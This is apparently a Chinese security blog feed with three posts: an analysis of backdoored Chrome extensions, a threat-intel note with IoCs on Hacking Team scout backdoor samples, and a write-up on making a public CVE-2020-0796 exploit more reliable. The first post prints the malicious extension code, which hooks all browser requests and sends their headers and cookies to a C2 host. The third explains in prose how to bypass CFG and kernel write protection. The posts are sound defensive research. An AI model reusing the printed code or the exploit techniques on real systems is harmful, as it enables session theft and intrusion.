目前,Google已将相关扩展程序从 Web Store 中删除。Firefox插件则不受影响。

影响范围

Chrome Webstore显示的各扩展程序的安装量如下:

  • User-Agent Switcher: 100 000+
  • Nano Defender: 200 000+
  • Nano Adblocker: 100 000+

360安全大脑显示,国内已有多位用户中招。我们尚不清楚有多少人安装了受影响的扩展程序,但从国外社区反馈来看,安装相关插件的用户不在少数,考虑到安装基数,我们认为此次事件影响较为广泛,请广大Chrome用户提高警惕,对相关扩展程序进行排查,以防被恶意组织利用。

国外社区用户研究者报告了User-Agent Switcher随机点赞facebook/Instagram照片的行为,虽然我们目前还没有看到有窃取密码或远程登录的行为,但是考虑到这些插件能够收集浏览器请求头(其中也包括cookies),我们可以合理推测,攻击者是能够利用收集到的信息进行未授权登录的。为了防止更进一步危害的发生,我们在此建议受影响的Chrome用户:

  • 及时移除插件
  • 检查 Facebook/Instagram 账户是否存在来历不明的点赞行为
  • 检查账户是否存在异常登录情况
  • 修改相关账户密码
  • 登出所有浏览器会话

Timeline

  • 8月29日,User-Agent Switcher 更新 2.0.0.9 版本
  • 9月7日,User-Agent Switcher 更新 2.0.1.0 版本
  • 10月3日,Nano Defender作者jspenguin2017宣布将 Nano Defender 转交给其他开发者维护
  • 10月7日,reddit用户 ufo56 发布帖子,报告 User-Agent Switcher 的恶意行为
  • 10月15日,Nano Defender 更新 15.0.0.206 版本,同时:
    • 有开发者报告新开发者在商店中更新的 15.0.0.206 版本与repository中的代码不符(多了background/connection.js
    • uBlock开发者gorhill对新增代码进行了分析

代码分析

User-Agent Switcher

影响版本:2.0.0.9, 2.0.1.0

修改文件分析

User-Agent Switcher 2.0.0.8与2.0.0.9版本的文件结构完全相同,攻击者仅修改了其中两个文件:js/background.min.jsjs/JsonValues.min.js

三个版本文件大小有所不同
文件结构相同

background.min.js

js/background.min.js 中定义了扩展程序的后台操作。

攻击者修改的部分代码

完整代码如下所示。

// 完整代码
// 发起到 C2 的连接
var userAgent = io("https://www.useragentswitch.com/");
async function createFetch(e) {
    let t = await fetch(e.uri, e.attr),
        s = {};
    return s.headerEntries = Array.from(t.headers.entries()), 
           s.data = await t.text(), 
           s.ok = t.ok, 
           s.status = t.status, 
           s
}
// 监听“createFetch”事件
userAgent.on("createFetch", async function (e) {
    let t = await createFetch(e);
    userAgent.emit(e.callBack, t)
});
handlerAgent = function (e) {
    return -1 == e.url.indexOf("useragentswitch") && userAgent.emit("requestHeadersHandler", e), {
        requestHeaders: JSON.parse(JSON.stringify(e.requestHeaders.reverse()).split("-zzz").join(""))
    }
};
// hook浏览器请求
chrome.webRequest.onBeforeSendHeaders.addListener(handlerAgent, {
    urls: ["<all_urls>"]
}, ["requestHeaders", "blocking", "extraHeaders"]);

攻击者添加的代码中定义了一个到 https://www.useragentswitch.com 的连接,并hook了浏览器的所有网络请求。当url中未包含 useragentswitch 时,将请求头编码后发送到C2。除此之外,当js代码接收到“createFetch”事件时,会调用 createFetch 函数,从参数中获取uri等发起相应请求。

由此我们推测,如果用户安装了此插件,C2通过向插件发送“createFetch”事件,使插件发起请求,完成指定任务,例如reddit用户提到的facebook/instagram点赞。攻击者能够利用此种方式来获利。

插件发起的网络请求(图片来自reddit)

在处理hook的请求头时,js代码会替换掉请求头中的 -zzz 后再发送,但我们暂时无法得知这样操作的目的是什么。

User-Agent Switcher 2.0.0.9 和 2.0.1.0 版本几乎相同,仅修改了 js/background.min.js 文件中的部分代码顺序,在此不做多述。

JsonValues.min.js

js/JsonValues.min.js 中原本为存储各UserAgent的文件。攻击者在文件后附加了大量js代码。经过分析,这些代码为混淆后的socketio客户端

攻击者添加的js代码

Nano Defender

影响版本:15.0.0.206

在Nano Defender中,攻击者同样修改了两个文件:

background/connection.js
background/core.js

其中,background/connection.js 为新增的文件,与User-Agent Switcher中的 js/JsonValues.min.js 相同,为混淆后的socketio客户端。

core.js

background/core.js 与User-Agent Switcher中的 js/background.min.js 相似,同样hook浏览器的所有请求并发送至C2(https://def.dev-nano.com/),并监听dLisfOfObject事件,发起相应请求。

background/core.js 部分修改代码

与User-Agent Switcher不同的是,在将浏览器请求转发至C2时,会使用正则过滤。过滤原则为C2返回的listOfObject,如果请求头满足全部条件,则转发完整的请求头,否则不予转发。

可以看出,攻击者对原本的转发策略进行了优化,从最初的几乎全部转发修改为过滤转发,这使得攻击者能够更为高效地获取感兴趣的信息。

同样地,core.js在发送请求头之前,会删除请求头中的-zzz字符串。只是这次core.js做了简单混淆,使用ASCII数组而非直接的-zzz字符串。

var m = [45,122,122,122]
var s = m.map( x => String.fromCharCode(x) )
var x = s.join("");
var replacerConcat = stringyFy.split(x).join(""); 
var replacer = JSON.parse(replacerConcat); 
return { 
    requestHeaders: replacer 
} 

uBlock的开发者gorhill对此代码进行了比较详细的分析,我们在此不做赘述。

Nano Adblocker

影响版本:未知

尽管有报告提到,Nano Adblocker 1.0.0.154 版本也被植入了恶意代码,但是我们并没有找到此版本的扩展程序文件以及相关资料。尽管该扩展程序已被下架,我们仍旧无法确认Google商店中的插件版本是否为受影响的版本。第三方网站显示的版本历史中的最后一次更新为2020年8月26日,版本号为1.0.0.153。

Nano Adblocker 更新历史

版本历史

由于各插件已被Google下架,我们无法从官方商店获取插件详情。根据第三方网站,User-Agent Switcher 版本历史如下:

可以看到,第一个存在恶意功能的插件版本2.0.0.9更新日期为2020年8月29日,而插件连接域名useragentswitch[.]com注册时间为2020年8月28日。

第三方网站显示的 Nano Defender 版本历史显示,攻击者在2020年10月15日在Google Web Store上更新了15.0.0.206版本,而C2域名dev-nano.com注册时间为2020年10月11日。

关联分析

我们对比了User-Agent Switcher和Nano Defender的代码。其中,js/background.js (from ua switcher)和background/core.js (from nano defender) 两个文件中存在相同的代码。

左图为ua switcher 2.0.0.9新增的部分代码,右图为nano defender新增的部分代码

可以看到,两段代码几乎完全相同,仅对变量名称、代码布局有修改。此外,两段代码对待转发请求头的操作相同:都替换了请求头中的-zzz字符串。

左图为ua switcher 2.0.0.9,右图为nano defender

由此,我们认为,两个(或三个)扩展程序的始作俑者为同一人。

Nano Defender新开发者创建了自己的项目。目前该项目以及账户(nenodevs)均已被删除,因此我们无法从GitHub主页获取到有关他们的信息。

攻击者使用的两个域名都是在插件上架前几天注册的,开启了隐私保护,并利用CDN隐藏真实IP,而他们在扩展程序中使用的C2地址 www.useragentswitch.comwww.dev-nano.com 目前均指向了namecheap的parkingpage。

图片来自360netlab

Nano Defender原作者称新开发者是来自土耳其的开发团队,但是我们没有找到更多的信息证实攻击者的身份。

小结

攻击者利用此类插件能达成的目的有很多。攻击者通过请求头中的cookie,能够获取会话信息,从而未授权登录;如果登录银行网站的会话被截取,用户资金安全将难保。就目前掌握的证据而言,攻击者仅仅利用此插件随机点赞,而没有更进一步的操作。我们无法判断是攻击者本身目的如此,或者这只是一次试验。

窃取用户隐私的浏览器插件并不罕见。早在2017年,在v2ex论坛就有用户表示,Chrome中另一个名为 User-Agent Switcher 的扩展程序可能存在未授权侵犯用户隐私的恶意行为;2018年卡巴斯基也发布了一篇关于Chrome恶意插件的报告。由于Google的审核流程并未检测到此类恶意插件,攻击者仍然可以通过类似的手法进行恶意活动。

IoCs

f45d19086281a54b6e0d539f02225e1c -> user-agent switcher 2.0.0.9
6713b49aa14d85b678dbd85e18439dd3 -> user-agent switcher 2.0.0.9
af7c24be8730a98fe72e56d2f5ae19db -> nano defender 15.0.0.206
useragentswitch.com
dev-nano.com

References

https://www.reddit.com/r/chrome/comments/j6fvwm/extension_with_100k_installs_makes_your_chrome/
https://www.reddit.com/r/cybersecurity/comments/jeekgw/google_chrome_extension_nano_defender_marked_as/
https://github.com/jspenguin2017/Snippets/issues/5
https://github.com/NanoAdblocker/NanoCore/issues/362
https://github.com/partridge-tech/chris-blog/blob/uas/_content/2020/extensions-the-next-generation-of-malware/user-agent-switcher.md
https://www.v2ex.com/t/389340?from=timeline&isappinstalled=0

凛冬将至,恶魔重新降临 —— 浅析 Hacking Team 新活动

By: liuchuang
29 September 2020 at 10:49

背景

Hacking Team 是为数不多在全球范围内出售网络武器的公司之一,从 2003 年成立以来便因向政府机构出售监视工具而臭名昭著。

2015年7月,Hacking Team 遭受黑客攻击,其 400GB 的内部数据,包括曾经保密的客户列表,内部邮件以及工程化的漏洞和后门代码被全部公开。随后,有关 hacking team 的活动突然销声匿迹。

2018年3月 ESET 的报告指出:Hacking Team 一直处于活跃状态,其后门版本也一直保持着稳定的更新。

2018年12月360高级威胁应对团队的报告披露了 Hacking Team 使用 Flash 0day 的”毒针”行动。

2019年11月360高级威胁应对团队的报告披露了 APT-C-34 组织使用 Hacking Team 网络武器进行攻击。

2020年4月360诺亚实验室的报告披露出 Hacking Team 新的攻击活动。

以上信息表明,Hacking Team 依旧处于活跃状态,并且仍然保持着高水准的网络武器开发能力。

概述

2020年9月11日,VirusTotal 上传了一份来自白俄罗斯的 rtf 恶意文档样本,该样本疑似 CVE-2020-0968 漏洞首次被发现在野利用。国内友商将此攻击事件称为“多米诺行动”,但并未对其进行更丰富的归因。

我们分析相关样本后发现,该行动中使用的后门程序为 Hacking Team scout 后门的 38 版本。

此版本的后门使用了打印机图标,伪装成 Microsoft Windows Fax and Scan 程序。

和之前的版本一样,该样本依然加了VMP壳,并使用了有效的数字签名:

此样本的后门 ID 为031b000000015

C2 为 185.243.112[.]57

和之前的版本相同,scout 使用 post 方式,将加密信息上传至 185.243.112[.]57/search,且使用了相同的 UserAgent。由于其版本间的功能变化不大,我们在此不再对其进行详细分析。若对 scout 后门技术细节感兴趣,可以参考我们之前发布的报告

关联分析

通过签名我们关联到另外一起针对俄罗斯的攻击事件。

关联到的样本名为: дело1502-20памятка_эл72129.rtf,中文翻译为:案例 1502-20 备忘录。rtf运行后,会从远程服务器 23.106.122[.]190 下载 mswfs.cab 文件,并释放后门程序到 %UserProfile%\AppData\Local\Comms\mswfs.exe。9月26日分析时,从服务器下载的 mswfs.cab 文件为正常的 winrar 安装包文件。

mswfs.exe 同样为 scout 后门38版本。

与针对白俄罗斯的攻击中的样本相同,该样本伪装成 Microsoft Windows Fax and Scan 程序,并使用了相同的数字签名。

此样本后门 ID 和 C2 如下图所示。

BACKDOOR_ID:71f8000000015
C2: 87.120.37[.]47

通过对远程服务器 23.106.122[.]190 进行分析,我们发现该 ip 关联的域名为 gvpgov[.]ru,注册日期为2020年9月11号。该域名为 gvp.gov.ru 的伪装域名,直接访问 23.106.122[.]190 会跳转到 https://www.gvp.gov.ru/gvp/documents ,即俄罗斯军事检察官办公室门户。

结论

结合白俄罗斯上传的 “СВЕДЕНИЯ О ПОДСУДИМОМ.rtf” (中文翻译为“有关被告的信息”)样本和关联到的新样本,我们可以推测,此次行动是攻击者使用 Hacking Team 网络武器库针对俄罗斯与白俄罗斯军事/司法部门相关人员的一次定向攻击事件。

结合当前时间节点,俄罗斯、白俄罗斯和中国军队在俄罗斯阿斯特拉罕州卡普斯京亚尔靶场举行“高加索-2020”战略演习,白俄罗斯与俄罗斯联合开展“斯拉夫兄弟情2020”联合战术演习,9月14日的俄白总统会谈,以及白俄罗斯的示威活动,也给此次攻击增添了重重政治意味。

关于HT

2019年4月,Hacking Team 这家意大利公司被另一家网络安全公司收购并更名为 Memento Labs。一年多之后的2020年5月,Hacking Team 的创始人和前首席执行官 David Vincenzetti 在其官方 LinkedIn 账号上发布了一条简短的消息:

Hacking Team is dead.

Hacking Team 的几名主要员工离职后,尽管新产品的开发速度有所减缓,但通过观测到的 scout 后门版本的更新情况,我们发现 Hacking Team 仍然保持着较高频率的活跃,这也说明 Memento Labs 一直在努力试图崛起。

观测到的时间 scout版本号 签名 签名有效期 伪装的程序
2019-10 35 KELSUREIWT LTD 2018.10-2019.10 ActiveSync RAPI Manager
2020-01 35 CODEMAT LTD 2019.06-2020.06 ActiveSync RAPI Manager
2020-05 36 Pribyl Handels GmbH 2019.12-2020.12 ActiveSync RAPI Manager
2020-09 38 Sizg Solutions GmbH 2019.12-2020.12 Microsoft Windows Fax and Scan

IoCs

针对俄罗斯的攻击

Hash

9E570B21929325284CF41C8FCAE4B712 mswfs.exe

BACKDOOR_ID

71f8000000015

IP

23.106.122[.]190
87.120.37[.]47

针对白俄罗斯的攻击

hash

60981545a5007e5c28c8275d5f51d8f0 СВЕДЕНИЯ О ПОДСУДИМОМ.rtf
ba1fa3cc9c79b550c2e09e8a6830e318 dll
f927659fc6f97b3f6be2648aed4064e1 exe

BACKDOOR_ID

031b000000015

IP

94.156.174[.]7
185.243.112[.]57

CVE-2020-0796漏洞realworld场景实现改进说明

By: gaoya
14 July 2020 at 09:51

在此前跟进CVE-2020-0796的过程中,我们发现公开代码的利用稳定性比较差,经常出现蓝屏的情况,通过研究,本文分享了CVE-2020-0796漏洞实现在realworld使用过程中遇到的一些问题以及相应的解决方法。

Takeaways

  • 我们分析了exp导致系统蓝屏的原因,并尝试对其进行了改进;
  • 相对于重构前exp,重构后的exp执行效率与稳定性都有显著提高;
  • 关于漏洞原理阐述,Ricerca Security在2020年4月份发布的一篇blog中已非常清晰,有兴趣的读者可以移步阅读,本文不再赘述。

初步选择和测试公开exp可用性

测试环境:VMWare,Win10专业版1903,2G内存,2处理核心

为了测试和说明方便,我们可以将exp的执行分为3个阶段:

  1. 漏洞利用到内核shellcode代码开始执行
  2. 内核shellcode代码执行
  3. 用户层shellcode执行

根据实际情况,我们测试了chompie1337ZecOps的漏洞利用代码。根据各自项目的说明文档,两份代码初步情况如下:

  • ZecOps

ZecOps的利用代码是在单个处理器的目标计算机系统上测试的;在后续的实际测试中,发现其代码对多处理器系统的支持不足,虽然在测试环境中进行了多次测试中,系统不会产生BSOD,但漏洞无法成功利用(即exp执行第一阶段失败)。

  • chompie1337

chompie1337的代码在漏洞利用阶段则表现得十分稳定,但在内核shellcode执行时会造成系统崩溃。

因此,我们决定将chompie1337的利用代码作为主要测试对象。

内核shellcode问题定位

我们在win10 1903中测试了chompie1337的exp代码,绝大部分的崩溃原因是在漏洞利用成功后、内核shellcode代码执行(即exp执行的第二阶段)时,申请用户空间内存的API zwAllocateVirtualMemory调用失败。在我们的多次测试中,崩溃现场主要包括以下两种:

Crash_A backtrace
Crash_B backtrace

对比exp正常执行时的流程和崩溃现场,我们发现无论是哪种崩溃现场,根本原因都是在内核态申请用户态内存时,调用MiFastLockLeafPageTable时(crash_A是在MiMakeHyperRangeAccessible中调用MiFastLockLeafPageTable,crash_B在MiGetNextPageTable中调用MiFastLockLeafPageTable)函数内部出现错误,导致系统崩溃。

在遇到crash_B时,我们起初认为这是在内核态申请用户态读写权限内存时,系统复制CFG Bitmap出现的异常。CFG(Control Flow Guard,控制流防护)会检查内存申请等关键API调用者是否有效,以避免出现安全问题。

随后,我们尝试了一些CFG绕过的方法,包括替换内存申请API间接调用地址,强制修改进程CFG启动标志等,这些方法无一例外都失败了。但在尝试过程中,ZecOps在他的漏洞分析利用文章中提到的一篇文章给了我们启发。zerosum0x0这篇文章分析了cve-2019-0708漏洞内核shellcode不能稳定利用的原因,其中提到了微软针对Intel CPU漏洞的缓解措施,KVA Shadow。

我们再次详细分析了导致MiFastLockLeafPageTable调用失败的原因,发现MiFastLockLeafPageTable函数中的分页表地址(即下图中的v12)可能会无效。

我们根据KVA Shadow缓解措施原理,猜测这是本次测试exp崩溃的根本原因。内核shellcode在调用API申请用户层内存时,由于KVA Shadow对于用户层和内核层的系统服务调用陷阱,如果IRQL等级不是PASSIVE_LEVEL,无法获取到正确的用户层映射地址。

解决问题

通过参考zerosum0x0文章中修正CVE-2019-0708 payload来绕过KVA Shadow的代码,但出于时间以及系统稳定性等多方面因素,我们暂时放弃了这种方法,转而尝试通过一种更简单和容易的方式来解决这个问题。

显而易见地,如果我们能够在内核shellcode中降低系统调用中的IRQL,将其调整为PASSIVE_LEVEL,就能够解决后续shellcode执行时由于用户态内存分配出现崩溃的问题。但在公开资料的查找过程中,我们并没有找到针对win10系统的IRQL修改方法。

于是,我们从崩溃本身出发,试图对这种情况进行改进。由于内核shellcode是从DISPATCH_LEVEL的IRQL开始执行的,调用内存分配等API时,可能因为分页内存的异常访问导致崩溃,于是我们尝试避免系统访问可能崩溃的分页内存。

在重新比对分析crash_B和成功执行的利用代码时,我们发现MiCommitVadCfgBits函数中会检查进程的CFG禁用标志是否开启(下图中的MiIsProcessCfgEnabled函数)。如果能够跳过CFG的处理机制,那么就可以避免系统在内存申请过程中处理CFG位图时对可能存在问题的分页内存的访问。

进一步对MiIsProcessCfgEnabled进行分析,该标志位在进程TEB中,可以通过GS寄存器访问和修改。

我们在内核shellcode调用zwAllocateVirtualMemory API之前修改CFG标志,就可以避免大部分崩溃情况(即B类型),顺利完成用户态内存的分配。需要一提的是,win10在内存申请时,大部分系统处理过程都是针对CFG的相关处理,导致B类型崩溃产生的次数在实际测试中占比达80%以上,所以我们没有考虑A类型崩溃的情况。

参考Google Researcher Bruce Dawson有关windows创建进程性能分析的文章 <O(n^2) in CreateProcess>

实际修改shellcode遇到的问题

在修改CFG标志位解决大部分内核shellcode崩溃的问题后,我们在实际测试中又发现,该exp无法执行用户层shellcode(即exp执行第三阶段)。经过分析发现,这是由于用户层shellcode会被用户层CFG检查机制阻断(参考:https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html)。CFG阻断可以分为两种情况:一是对用户层APC起始地址代码的调用;二是用户层shellcode中对创建线程API的调用。下图的代码就是针对第二种情况的阻断机制:只有当线程地址通过CFG检查时,才会跳转到指定的shellcode执行。

这里我们采用了zerosum0x0文章中的方式:在内核shellcode中,patch CFG检查函数(ldrpvalidateusercalltarget和ldrpdispatchusercalltarget),跳过CFG检查过程来达到目的。需要注意的是,在内核态修改用户态代码前,要修改cr0寄存器来关闭代码读写保护。

另外,在patch CFG检查函数时,使用相对偏移查找相应的函数地址。由于CVE-2020-0796只影响win10 1903和1909版本,因此这种方法是可行的。但如果是其他更通用的漏洞,还需要考虑一种更加合理的方式来寻找函数地址。

最终测试

我们在win10 1903(专业版/企业版)和win10 1909(专业版/企业版)中测试了代码。经过测试,修改后的exp代码执行成功率从不到20%上升到了80%以上。但我们的修改仍然是不完美的:

  1. 本文并没有解决漏洞利用阶段可能出现的问题。尽管chompie1337的漏洞利用阶段代码已经非常完善,但仍不是100%成功。考虑到漏洞利用阶段出现崩溃的概率非常低(在我们的实际测试中,出现概率低于10%),如果系统处于流畅运行,这种概率会更小,我们的exp仍然使用了chompie1337在漏洞利用阶段的代码。
  2. 在本文中,我们尝试解决了由CFG处理机制导致的崩溃情形(即类型B的情况),没有从根本上解决内核shellcode执行阶段的崩溃。在这个阶段,shellcode仍然可能导致系统崩溃出现蓝屏,但这种概率比较低,在我们的测试中没有超过20%。
  3. 在使用本文的方式成功执行用户态shellcode之后,系统处于一种不稳定状态。如果系统中有其他重要进程频繁进行API调用,系统大概率会崩溃;如果仅通过反弹的后台shell执行命令,系统会处在一种相对稳定的状态。我们认为,对渗透测试来说,改进后的exp已经基本能够满足需求。

其他方案

除本文讨论的内容外,还可以通过内核shellcode直接写文件到启动项的方式来执行用户态代码。从理论上讲,这种方式能够避免内核shellcode在申请用户层内存时产生崩溃的问题,但对于渗透测试场景而言,该方法需要等待目标重启主机,实时性并不高,本文不在此进行具体讨论。

总结

针对网络公开的CVE-2020-0796 exp在实际使用过程中会产生崩溃的问题,本文分享了一些方法来解决这些问题,以便满足实际在渗透测试等应用场景中的需求。尽管本文的方法不尽完美,但我们希望我们的研究工作能够为诸位安全同僚提供一些思路。我们也会在后续的工作当中,持续对此进行研究,力图找到一种更简单、通用的方式解决问题。

❌
❌